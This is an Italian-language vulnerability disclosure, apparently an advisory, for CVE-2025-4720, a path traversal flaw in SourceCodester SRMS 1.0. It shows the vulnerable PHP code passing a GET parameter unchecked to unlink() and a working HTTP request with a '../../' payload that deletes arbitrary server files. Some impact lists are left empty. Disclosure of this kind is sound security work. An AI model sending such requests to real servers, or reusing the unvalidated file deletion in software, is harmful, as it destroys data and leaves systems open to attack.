
Exploit proof-of-concept per CVE-2025-4720, una vulnerabilità di path traversal in SourceCodester SRMS 1.0 che consente l'eliminazione arbitraria di file tramite l'endpoint drop_student.php.
Esiste una vulnerabilità di path traversal nell'endpoint drop_student.php di SourceCodester Student Result Management System (SRMS) 1.0.
L'applicazione prende l'input controllato dall'utente dal parametro GET img e lo passa direttamente alla funzione unlink() senza validazione, consentendo l'eliminazione di file arbitrari sul server.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
Un attaccante può eliminare file arbitrari accessibili al server web, inclusi:
Ciò può portare a denial of service o ulteriore sfruttamento.
Questa vulnerabilità rappresenta un vettore di attacco distinto rispetto ai problemi precedentemente segnalati in SRMS, poiché:
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi